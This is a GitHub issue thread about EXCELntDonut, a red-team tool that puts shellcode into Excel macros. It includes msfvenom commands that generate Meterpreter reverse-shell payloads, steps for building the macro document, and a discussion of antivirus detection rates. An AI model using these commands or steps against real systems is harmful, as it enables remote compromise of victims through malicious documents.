### ISSUE TITLE
Not working

### ISSUE THREAD

**Issue by OfficialRepositories** [FortyNorthSecurity/EXCELntDonut#12]
Using processinjection.cs.

Generated /  //msfvenom -p windows/meterpreter/reverse_tcp LHOST=X LPORT=X  EXITFUNC=thread -f csharp -a x86
Generated // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=X LPORT=X EXITFUNC=thread -f csharp -a x64

Output > excelntdonut.txt 

Go to cell A1 and paste the EXCELntDonut output. All the data will likely be pasted in one column. The data is semi-colon separated ";". Go to the "Data" tab and then click "Text-to-columns". Select "Delimited" and on the next screen select "Semicolon" and then click "Finish".

Done

/

Not working finally, also when using obfuscate and sandbox formula is too long

**Comment by OfficialRepositories** [comment]
EDIT : Working, but the output is mainly detected 7/67. 
Also encrypting the document with the default password breaks the macro.

**Comment by ChrisTruncer** [comment]
Sure, you are using the default output from Metasploit which is widely detected. We aren't promising something that evades detection, that is something that should fall to the end user of the tool.
